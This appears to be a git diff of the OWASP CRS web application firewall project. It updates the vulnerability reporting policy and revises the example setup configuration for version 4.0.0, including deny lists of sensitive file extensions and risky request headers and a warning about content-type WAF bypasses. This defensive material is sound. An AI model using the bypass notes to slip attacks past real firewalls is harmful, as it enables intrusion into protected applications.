36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg: Good signature from "OWASP Core Rule Set " [ultimate] +``` ## Reporting a Vulnerability -We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. +We strive to make the OWASP CRS accessible to a wide audience of beginner and experienced users. We welcome bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. Submit these types of non-vulnerability related issues via Github. Please include your installed version and the relevant portions of your audit log. -False negative or common bypasses should [create an issue](https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/new) so they can be addressed. +False negative or common bypasses should [create an issue](https://github.com/coreruleset/coreruleset/issues/new) so they can be addressed. Do this before submitting a vulnerability using our email: 1) Verify that you have the latest version of OWASP CRS. 2) Validate which Paranoia Level this bypass applies to. If it works in PL4, please send us an email. 3) If you detected anything that causes unexpected behavior of the engine via manipulation of existing CRS provided rules, please send it by email. -Our email is [security@coreruleset.org](mailto:security@coreruleset.org). You can send us encrypted email using [this key](https://coreruleset.org/security.asc), (fingerprint: `3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72`). +We also provide you with the [Sandbox project](https://coreruleset.org/docs/development/sandbox/), where you can test your bypass and report back to us. If testing using the sandbox, please include the `X-Unique-ID` from the response in your email. + +Our email is [security@coreruleset.org](mailto:security@coreruleset.org). You can send us encrypted email using the same GPG key we use to sign releases, fingerprint: `3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72`. We are happy to work with the community to provide CVE identifiers for any discovered security issues if requested. If in doubt, feel free to reach out to us! + +The OWASP CRS Team. diff --git a/SPONSORS.md b/SPONSORS.md new file mode 100644 index 0000000000..7e4a32e6d9 --- /dev/null +++ b/SPONSORS.md @@ -0,0 +1,8 @@ +## GOLD SPONSORS + +* Google +* United Security Providers + +## SILVER SPONSORS + +* Swiss Post diff --git a/crs-setup.conf.example b/crs-setup.conf.example index 6e1899685d..17cd6a9625 100644 --- a/crs-setup.conf.example +++ b/crs-setup.conf.example @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -11,15 +12,15 @@ # # -- [[ Introduction ]] -------------------------------------------------------- # -# The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack +# The OWASP CRS is a set of generic attack # detection rules that provide a base level of protection for any web # application. They are written for the open source, cross-platform # ModSecurity Web Application Firewall. # # See also: # https://coreruleset.org/ -# https://github.com/SpiderLabs/owasp-modsecurity-crs -# https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project +# https://github.com/coreruleset/coreruleset +# https://owasp.org/www-project-modsecurity-core-rule-set/ # @@ -174,12 +175,12 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Uncomment this rule to change the default: # #SecAction \ -# "id:900000,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.paranoia_level=1" +# "id:900000,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.blocking_paranoia_level=1" # It is possible to execute rules from a higher paranoia level but not include @@ -188,24 +189,24 @@ SecDefaultAction "phase:2,log,auditlog,pass" # the new rules would lead to false positives that raise your score above the # threshold. # This optional feature is enabled by uncommenting the following rule and -# setting the tx.executing_paranoia_level. -# Technically, rules up to the level defined in tx.executing_paranoia_level -# will be executed, but only the rules up to tx.paranoia_level affect the +# setting the tx.detection_paranoia_level. +# Technically, rules up to the level defined in tx.detection_paranoia_level +# will be executed, but only the rules up to tx.blocking_paranoia_level affect the # anomaly scores. -# By default, tx.executing_paranoia_level is set to tx.paranoia_level. -# tx.executing_paranoia_level must not be lower than tx.paranoia_level. +# By default, tx.detection_paranoia_level is set to tx.blocking_paranoia_level. +# tx.detection_paranoia_level must not be lower than tx.blocking_paranoia_level. # -# Please notice that setting tx.executing_paranoia_level to a higher paranoia +# Please notice that setting tx.detection_paranoia_level to a higher paranoia # level results in a performance impact that is equally high as setting -# tx.paranoia_level to said level. +# tx.blocking_paranoia_level to said level. # #SecAction \ -# "id:900001,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.executing_paranoia_level=1" +# "id:900001,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.detection_paranoia_level=1" # @@ -224,16 +225,16 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Uncomment this rule to change the default: # #SecAction \ -# "id:900010,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.enforce_bodyproc_urlencoded=1" +# "id:900010,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.enforce_bodyproc_urlencoded=1" # -# -- [[ Anomaly Mode Severity Levels ]] ---------------------------------------- +# -- [[ Anomaly Scoring Mode Severity Levels ]] -------------------------------- # # Each rule in the CRS has an associated severity level. # These are the default scoring points for each severity level. @@ -257,19 +258,19 @@ SecDefaultAction "phase:2,log,auditlog,pass" # that all configuration variables are set before the CRS rules are processed.) # #SecAction \ -# "id:900100,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.critical_anomaly_score=5,\ -# setvar:tx.error_anomaly_score=4,\ -# setvar:tx.warning_anomaly_score=3,\ -# setvar:tx.notice_anomaly_score=2" +# "id:900100,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.critical_anomaly_score=5,\ +# setvar:tx.error_anomaly_score=4,\ +# setvar:tx.warning_anomaly_score=3,\ +# setvar:tx.notice_anomaly_score=2" # -# -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------ +# -- [[ Anomaly Scoring Mode Blocking Threshold Levels ]] ---------------------- # # Here, you can specify at which cumulative anomaly score an inbound request, # or outbound response, gets blocked. @@ -309,57 +310,121 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Uncomment this rule to change the defaults: # #SecAction \ -# "id:900110,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.inbound_anomaly_score_threshold=5,\ -# setvar:tx.outbound_anomaly_score_threshold=4" - -# -# -- [[ Application Specific Rule Exclusions ]] ---------------------------------------- -# -# Some well-known applications may undertake actions that appear to be -# malicious. This includes actions such as allowing HTML or Javascript within -# parameters. In such cases the CRS aims to prevent false positives by allowing -# administrators to enable prebuilt, application specific exclusions on an -# application by application basis. -# These application specific exclusions are distinct from the rules that would -# be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as -# they are prebuilt for specific applications. The 'REQUEST-900' file is -# designed for users to add their own custom exclusions. Note, using these -# application specific exclusions may loosen restrictions of the CRS, -# especially if used with an application they weren't designed for. As a result -# they should be applied with care. -# To use this functionality you must specify a supported application. To do so -# uncomment rule 900130. In addition to uncommenting the rule you will need to -# specify which application(s) you'd like to enable exclusions for. Only a -# (very) limited set of applications are currently supported, please use the -# filenames prefixed with 'REQUEST-903' to guide you in your selection. -# Such filenames use the following convention: -# REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf -# -# It is recommended if you run multiple web applications on your site to limit -# the effects of the exclusion to only the path where the excluded webapp -# resides using a rule similar to the following example: -# SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1 - -# -# Modify and uncomment this rule to select which application: +# "id:900110,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.inbound_anomaly_score_threshold=5,\ +# setvar:tx.outbound_anomaly_score_threshold=4" + + +# +# -- [[ Application Specific Rule Exclusions ]] -------------------------------- +# +# CRS 3.x contained exclusion packages to tweak the CRS for use with common +# web applications, lowering the number of false positives. +# +# In CRS 4, these are no longer part of the CRS itself, but they are available +# as "CRS plugins". Some plugins improve support for web applications, and others +# may bring new functionality. Plugins are not installed by default, but can be +# downloaded from the plugin registry: +# https://github.com/coreruleset/plugin-registry +# +# For detailed information about using and installing plugins, please see: +# https://coreruleset.org/docs/concepts/plugins/ + + +# +# -- [[ Anomaly Score Reporting Level ]] --------------------------------------- +# +# When a request is blocked due to the anomaly score meeting or exceeding the +# anomaly threshold then the blocking rule will also report the anomaly score. +# This applies to the separate inbound and outbound anomaly scores. +# +# In phase 5, there are additional rules that can perform additional reporting +# of anomaly scores with a verbosity that depends on the reporting level defined +# below. +# +# By setting the reporting level you control whether you want additional +# reporting beyond the blocking rule or not and, if yes, which requests should +# be covered. The higher the reporting level, the more verbose the reporting is. +# +# There are 6 reporting levels: +# +# 0 - Reporting disabled +# 1 - Reporting for requests with a blocking anomaly score >= a threshold +# 2 - Reporting for requests with a detection anomaly score >= a threshold +# 3 - Reporting for requests with a blocking anomaly score greater than 0 +# 4 - Reporting for requests with a detection anomaly score greater than 0 +# 5 - Reporting for all requests +# +# Note: Reporting levels 1 and 2 make it possible to differentiate between +# requests that are blocked and requests that are *not* blocked but would have +# been blocked if the blocking PL was equal to detection PL. This may be useful +# for certain FP tuning methodologies, for example moving to a higher PL. +# +# A value of 5 can be useful on platforms where you are interested in logging +# non-scoring requests, yet it is not possible to report this information in +# the request/access log. This applies to Nginx, for example. # #SecAction \ -# "id:900130,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.crs_exclusions_cpanel=1,\ -# setvar:tx.crs_exclusions_drupal=1,\ -# setvar:tx.crs_exclusions_dokuwiki=1,\ -# setvar:tx.crs_exclusions_nextcloud=1,\ -# setvar:tx.crs_exclusions_wordpress=1,\ -# setvar:tx.crs_exclusions_xenforo=1" +# "id:900115,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.reporting_level=4" + + +# +# -- [[ Early Anomaly Scoring Mode Blocking ]] ------------------------------ +# +# The anomaly scores for the request and the responses are generally summed up +# and evaluated at the end of phase:2 and at the end of phase:4 respectively. +# However, it is possible to enable an early evaluation of these anomaly scores +# at the end of phase:1 and at the end of phase:3. +# +# If a request (or a response) hits the anomaly threshold in this early +# evaluation, then blocking happens immediately (if blocking is enabled) and +# the phase 2 (and phase 4 respectively) will no longer be executed. +# +# Enable the rule 900120 that sets the variable tx.early_blocking to 1 in order +# to enable early blocking. The variable tx.early_blocking is set to 0 by +# default. Early blocking is thus disabled by default. +# +# Please note that early blocking will hide potential alerts from you. This +# means that a payload that would appear in an alert in phase 2 (or phase 4) +# does not get evaluated if the request is being blocked early. So when you +# disabled early blocking again at some point in the future, then new alerts +# from phase 2 might pop up. +#SecAction \ +# "id:900120,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.early_blocking=1" + + +# +# -- [[ Initialize Default Collections ]] ----------------------------------- +# +# CRS provides a centralized option to initialize and populate collections +# meant to be used by plugins (E.g.DoS protection plugin). +# By default, Global and IP collections (see rule 901320), +# being not used by core rules, are not initialized. +# +# Uncomment this rule to change the default: +# +#SecAction \ +# "id:900130,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.enable_default_collections=1" + # # -- [[ HTTP Policy Settings ]] ------------------------------------------------ @@ -370,7 +435,6 @@ SecDefaultAction "phase:2,log,auditlog,pass" # # These variables are used in the following rule files: # - REQUEST-911-METHOD-ENFORCEMENT.conf -# - REQUEST-912-DOS-PROTECTION.conf # - REQUEST-920-PROTOCOL-ENFORCEMENT.conf # HTTP methods that a client is allowed to use. @@ -380,92 +444,167 @@ SecDefaultAction "phase:2,log,auditlog,pass" # MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK # Uncomment this rule to change the default. #SecAction \ -# "id:900200,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" +# "id:900200,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Content-Types that a client is allowed to send in a request. # Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| -# |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| -# |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream| -# |application/csp-report| |application/xss-auditor-report| |text/plain| +# |text/xml| |application/xml| |application/soap+xml| |application/json| +# |application/cloudevents+json| |application/cloudevents-batch+json| +# +# Please note, that the rule where CRS uses this variable (920420) evaluates it with operator +# `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom +# Content-Type with lowercase. +# +# Bypass Warning: some applications may not rely on the content-type request header in order +# to parse the request body. This could make an attacker able to send malicious URLENCODED/JSON/XML +# payloads without being detected by the WAF. Allowing request content-type that doesn't activate any +# body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc..) +# could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain" +# content type may still be interpreted as JSON by a backend application but would not trigger the +# JSON body parser at the WAF, leading to a bypass. +# +# To prevent blocking request with not allowed content-type by default, you can create an exclusion +# rule that removes rule 920420. For example: +#SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \ +# "id:1234,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# ctl:ruleRemoveById=920420,\ +# chain" +# SecRule REQUEST_URI "@rx ^/foo/bar" \ +# "t:none" +# # Uncomment this rule to change the default. +# #SecAction \ -# "id:900220,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream| |application/csp-report| |application/xss-auditor-report| |text/plain|'" +# "id:900220,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" # Allowed HTTP versions. -# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 -# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 +# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0 +# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0 # Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so # we include both version strings by default. # Uncomment this rule to change the default. #SecAction \ -# "id:900230,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" +# "id:900230,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" # Forbidden file extensions. # Guards against unintended exposure of development/configuration files. -# Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ +# Default: .asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ # Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ +# Note that .axd was removed due to false positives (see PR 1925). +# +# To additionally guard against configuration/install archive files from being +# accidentally exposed, common archive file extensions can be added to the +# restricted extensions list. An example list of common archive file extensions +# is presented below: +# .7z/ .br/ .bz/ .bz2/ .cab/ .cpio/ .gz/ .img/ .iso/ .jar/ .rar/ .tar/ .tbz2/ .tgz/ .txz/ .xz/ .zip/ .zst/ +# (Source: https://en.wikipedia.org/wiki/List_of_archive_formats) +# # Uncomment this rule to change the default. #SecAction \ -# "id:900240,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" - -# Forbidden request headers. -# Header names should be lowercase, enclosed by /slashes/ as delimiters. -# Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org -# Default: /proxy/ /lock-token/ /content-range/ /if/ +# "id:900240,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + +# Restricted request headers. +# The HTTP request headers that CRS restricts are split into two categories: +# basic (always forbidden) and extended (may be forbidden). All header names +# should be lowercase and enclosed by /slashes/ as delimiters. +# +# [ Basic ] +# Includes deprecated headers and headers with known security risks. Always +# forbidden. +# Default: /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ +# +# /content-encoding/ +# Used to list any encodings that have been applied to the original payload. +# Only used for compression, which isn't supported by CRS by default since CRS +# blocks newlines and null bytes inside the request body. Most compression +# algorithms require at least null bytes per RFC. Blocking Content-Encoding +# shouldn't break anything and increases security since WAF engines, including +# ModSecurity, are typically incapable of properly scanning compressed request +# bodies. +# +# /proxy/ +# Blocking this prevents the 'httpoxy' vulnerability: https://httpoxy.org +# +# /lock-token/ +# +# /content-range/ +# +# /if/ +# +# /x-http-method-override/ +# /x-http-method/ +# /x-method-override/ +# Blocking these headers prevents method override attacks, as described here: +# https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it +# # Uncomment this rule to change the default. #SecAction \ -# "id:900250,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /if/'" - -# File extensions considered static files. -# Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters. -# Used in DoS protection rule. See section "Anti-Automation / DoS Protection". -# Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ +# "id:900250,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'" +# +# [ Extended ] +# Includes deprecated headers that are still in use (so false positives are +# possible) and headers with possible security risks. Forbidden at a higher +# paranoia level. +# Default: /accept-charset/ +# +# /accept-charset/ +# Deprecated header that should not be used by clients and should be ignored +# by servers. Can be used for a response WAF bypass by asking for a charset +# that the WAF cannot decode. Considered to be a good indicator of suspicious +# behavior but produces too many false positives to be forbidden by default. +# References: +# https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset +# https://github.com/coreruleset/coreruleset/issues/3140 +# # Uncomment this rule to change the default. #SecAction \ -# "id:900260,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" +# "id:900255,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.restricted_headers_extended=/accept-charset/'" # Content-Types charsets that a client is allowed to send in a request. -# Default: utf-8|iso-8859-1|iso-8859-15|windows-1252 +# The content-types are enclosed by |pipes| as delimiters to guarantee exact matches. +# Default: |utf-8| |iso-8859-1| |iso-8859-15| |windows-1252| # Uncomment this rule to change the default. -# Use "|" to separate multiple charsets like in the rule defining -# tx.allowed_request_content_type. #SecAction \ -# "id:900280,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" +# "id:900280,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" # # -- [[ HTTP Argument/Upload Limits ]] ----------------------------------------- @@ -480,80 +619,82 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Block request if number of arguments is too high # Default: unlimited # Example: 255 +# Note that a hard limit by the engine may also apply here (SecArgumentsLimit). +# This would override this soft limit. # Uncomment this rule to set a limit. #SecAction \ -# "id:900300,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.max_num_args=255" +# "id:900300,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.max_num_args=255" # Block request if the length of any argument name is too high # Default: unlimited # Example: 100 # Uncomment this rule to set a limit. #SecAction \ -# "id:900310,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.arg_name_length=100" +# "id:900310,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.arg_name_length=100" # Block request if the length of any argument value is too high # Default: unlimited # Example: 400 # Uncomment this rule to set a limit. #SecAction \ -# "id:900320,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.arg_length=400" +# "id:900320,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.arg_length=400" # Block request if the total length of all combined arguments is too high # Default: unlimited # Example: 64000 # Uncomment this rule to set a limit. #SecAction \ -# "id:900330,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.total_arg_length=64000" +# "id:900330,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.total_arg_length=64000" # Block request if the file size of any individual uploaded file is too high # Default: unlimited # Example: 1048576 # Uncomment this rule to set a limit. #SecAction \ -# "id:900340,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.max_file_size=1048576" +# "id:900340,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.max_file_size=1048576" # Block request if the total size of all combined uploaded files is too high # Default: unlimited # Example: 1048576 # Uncomment this rule to set a limit. #SecAction \ -# "id:900350,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.combined_file_sizes=1048576" +# "id:900350,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.combined_file_sizes=1048576" # # -- [[ Easing In / Sampling Percentage ]] ------------------------------------- # -# Adding the Core Rule Set to an existing productive site can lead to false +# Adding the CRS to an existing productive site can lead to false # positives, unexpected performance issues and other undesired side effects. # # It can be beneficial to test the water first by enabling the CRS for a @@ -572,7 +713,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # following directive somewhere after the inclusion of the CRS # (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf). # -# SecRuleUpdateActionById 901150 "nolog" +#SecRuleUpdateActionById 901450 "nolog" # # ATTENTION: If this TX.sampling_percentage is below 100, then some of the # requests will bypass the Core Rules completely and you lose the ability to @@ -580,148 +721,14 @@ SecDefaultAction "phase:2,log,auditlog,pass" # # Uncomment this rule to enable this feature: # -#SecAction "id:900400,\ -# phase:1,\ -# pass,\ -# nolog,\ -# setvar:tx.sampling_percentage=100" - - -# -# -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------ -# -# Optionally, you can check the client IP address against the Project Honey Pot -# HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a -# free API key. Set it here with SecHttpBlKey. -# -# Project Honeypot returns multiple different malicious IP types. -# You may specify which you want to block by enabling or disabling them below. -# -# Ref: https://www.projecthoneypot.org/httpbl.php -# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey -# -# Uncomment these rules to use this feature: -# -#SecHttpBlKey XXXXXXXXXXXXXXXXX -#SecAction "id:900500,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.block_search_ip=1,\ -# setvar:tx.block_suspicious_ip=1,\ -# setvar:tx.block_harvester_ip=1,\ -# setvar:tx.block_spammer_ip=1" - - -# -# -- [[ GeoIP Database ]] ------------------------------------------------------ -# -# There are some rulesets that inspect geolocation data of the client IP address -# (geoLookup). The CRS uses geoLookup to implement optional country blocking. -# -# To use geolocation, we make use of the MaxMind GeoIP database. -# This database is not included with the CRS and must be downloaded. -# -# There are two formats for the GeoIP database. ModSecurity v2 uses GeoLite (.dat files), -# and ModSecurity v3 uses GeoLite2 (.mmdb files). -# -# If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files, -# see https://github.com/maxmind/geoipupdate. -# -# Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/ -# for configuration options. -# -# Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore. -# See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info. -# -# Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files -# from CSV files first. -# -# You can achieve this using https://github.com/sherpya/geolite2legacy -# Pick the zip files from maxmind site: -# https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip -# -# Follow the guidelines for installing the tool and run: -# ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \ -# -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat -# -# Update the database regularly, see Step 3 of the configuration link above. -# -# By default, when you execute `sudo geoipupdate` on Linux, files from the free database -# will be downloaded to `/usr/share/GeoIP` (both v1 and v2). -# -# Then choose from: -# - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3) -# - `GeoLiteCountry.dat` (if you are using ModSecurity v2) -# -# Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html -# Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html -# -# Uncomment only one of the next rules here to use this feature. -# Choose the one depending on the ModSecurity version you are using, and change the path accordingly: -# -# For ModSecurity v3: -#SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb -# For ModSecurity v2 (points to the converted one): -#SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat - -# -# -=[ Block Countries ]=- -# -# Rules in the IP Reputation file can check the client against a list of high -# risk country codes. These countries have to be defined in the variable -# tx.high_risk_country_codes via their ISO 3166 two-letter country code: -# https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements -# -# If you are sure that you are not getting any legitimate requests from a given -# country, then you can disable all access from that country via this variable. -# The rule performing the test has the rule id 910100. -# -# This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be -# downloaded (see the section "GeoIP Database" above.) -# -# By default, the list is empty. A list used by some sites was the following: -# setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'" -# -# Uncomment this rule to use this feature: -# #SecAction \ -# "id:900600,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.high_risk_country_codes='" +# "id:900400,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.sampling_percentage=100" -# -# -- [[ Anti-Automation / DoS Protection ]] ------------------------------------ -# -# Optional DoS protection against clients making requests too quickly. -# -# When a client is making more than 100 requests (excluding static files) within -# 60 seconds, this is considered a 'burst'. After two bursts, the client is -# blocked for 600 seconds. -# -# Requests to static files are not counted towards DoS; they are listed in the -# 'tx.static_extensions' setting, which you can change in this file (see -# section "HTTP Policy Settings"). -# -# For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf. -# -# Uncomment this rule to use this feature: -# -#SecAction \ -# "id:900700,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.dos_burst_time_slice=60',\ -# setvar:'tx.dos_counter_threshold=100',\ -# setvar:'tx.dos_block_timeout=600'" - # # -- [[ Check UTF-8 